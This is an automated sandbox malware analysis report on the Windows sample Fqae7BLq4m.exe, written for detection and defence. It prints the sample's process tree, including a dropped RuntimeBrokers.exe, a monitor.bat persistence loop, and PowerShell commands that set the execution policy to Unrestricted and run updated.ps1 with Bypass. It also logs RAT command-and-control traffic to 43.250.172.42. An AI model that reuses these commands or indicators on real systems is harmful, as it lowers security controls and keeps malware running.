

Windows Analysis Report
Fqae7BLq4m.exe

Overview

General Information

Sample name:Fqae7BLq4m.exe
Analysis ID:1579418
MD5:a994f2b3b899758bddf5f35e407a694d
SHA1:a13dedaceed797a4ee8b399c7db20e88535ab6cc
SHA256:6c547f7a7e7964a03945cef9bd53e792256e2beb24e15be780714ae349c8a81b
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Fqae7BLq4m.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\Fqae7BLq4m.exe" MD5: A994F2B3B899758BDDF5F35E407A694D)
    • cmd.exe (PID: 4348 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • RuntimeBrokers.exe (PID: 8220 cmdline: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: 30A274E00DA842B09E9763F19777ADED)
        • cmd.exe (PID: 8848 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • tasklist.exe (PID: 8912 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8944 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8196 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3240 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7572 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 592 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4480 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6748 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1728 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2396 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5332 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 788 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4000 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8056 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8164 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6048 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3512 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1060 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6008 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7468 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7544 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6808 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7744 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6276 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8944 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3012 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7076 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6928 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7416 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4456 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6172 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 4332 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2140 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6984 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7464 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2420 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8788 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • cmd.exe (PID: 8964 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 9036 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8984 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 9028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 9104 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4348, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ProcessId: 8220, ProcessName: RuntimeBrokers.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentProcessId: 8220, ParentProcessName: RuntimeBrokers.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8964, ProcessName: cmd.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 43.250.172.42, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, Initiated: true, ProcessId: 8220, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49766
Source: Process started | Author: frack113 | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 9036, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 9036, ProcessName: powershell.exe
Timestamp                        | SID     | Severity | Classtype                     | Source IP     | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T09:45:56.226506+0100  | 2052875 | 1        | A Network Trojan was detected | 192.168.11.20 | 49767       | 43.250.172.42  | 17091            | TCP
2024-12-22T09:49:10.745908+0100  | 2052875 | 1        | A Network Trojan was detected | 192.168.11.20 | 49774       | 43.250.172.42  | 17091            | TCP
2024-12-22T09:50:22.475076+0100  | 2052875 | 1        | A Network Trojan was detected | 192.168.11.20 | 49778       | 43.250.172.42  | 17091            | TCP
2024-12-22T09:51:31.826363+0100  | 2052875 | 1        | A Network Trojan was detected | 192.168.11.20 | 49781       | 43.250.172.42  | 17092            | TCP
2024-12-22T09:52:33.964927+0100  | 2052875 | 1        | A Network Trojan was detected | 192.168.11.20 | 49783       | 43.250.172.42  | 17092            | TCP


AV Detection

Source: C:\Users\user\AppData\Local\Temp\backup.dll | ReversingLabs: Detection: 42%
Source: C:\Users\Public\Bilite\Axialis\libcurl.dll | ReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exe | ReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exe | Virustotal: Detection: 19%
Source: Fqae7BLq4m.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201220974867.0000000008585000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb>1 source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb], source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb, source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: z:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: x:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: v:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: t:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: r:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: p:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: n:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: l:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: j:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: h:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: f:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: d:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: b:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: y:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: w:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: u:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: s:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: q:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: o:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: m:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: k:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: i:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: g:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File opened: [:
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z

Networking

Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49767 -> 43.250.172.42:17091
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49774 -> 43.250.172.42:17091
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49778 -> 43.250.172.42:17091
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49781 -> 43.250.172.42:17092
Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49783 -> 43.250.172.42:17092
Source: global traffic | TCP traffic: 43.250.172.42 ports 18852,17091,17092,1,2,5,8
Source: global traffic | TCP traffic: 192.168.11.20:49766 -> 43.250.172.42:18852
Source: Joe Sandbox View | ASN Name: VPSQUANUS VPSQUANUS
Source: unknown | TCP traffic detected without corresponding DNS query: 43.250.172.42 (this entry is repeated 50 times in the report)
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.log
Source: powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 0000000E.00000002.201214927053.0000000007114000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.o
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/check
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModule
Source: RuntimeBrokers.exe, 00000004.00000003.201172043695.00000000055C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DirectInput8Creatememstr_664e0faa-d
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_00404FAA
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_0041206B
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_0041022D
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_00411F91
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: String function: 0040243B appears 37 times
Source: Fqae7BLq4m.exe, 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
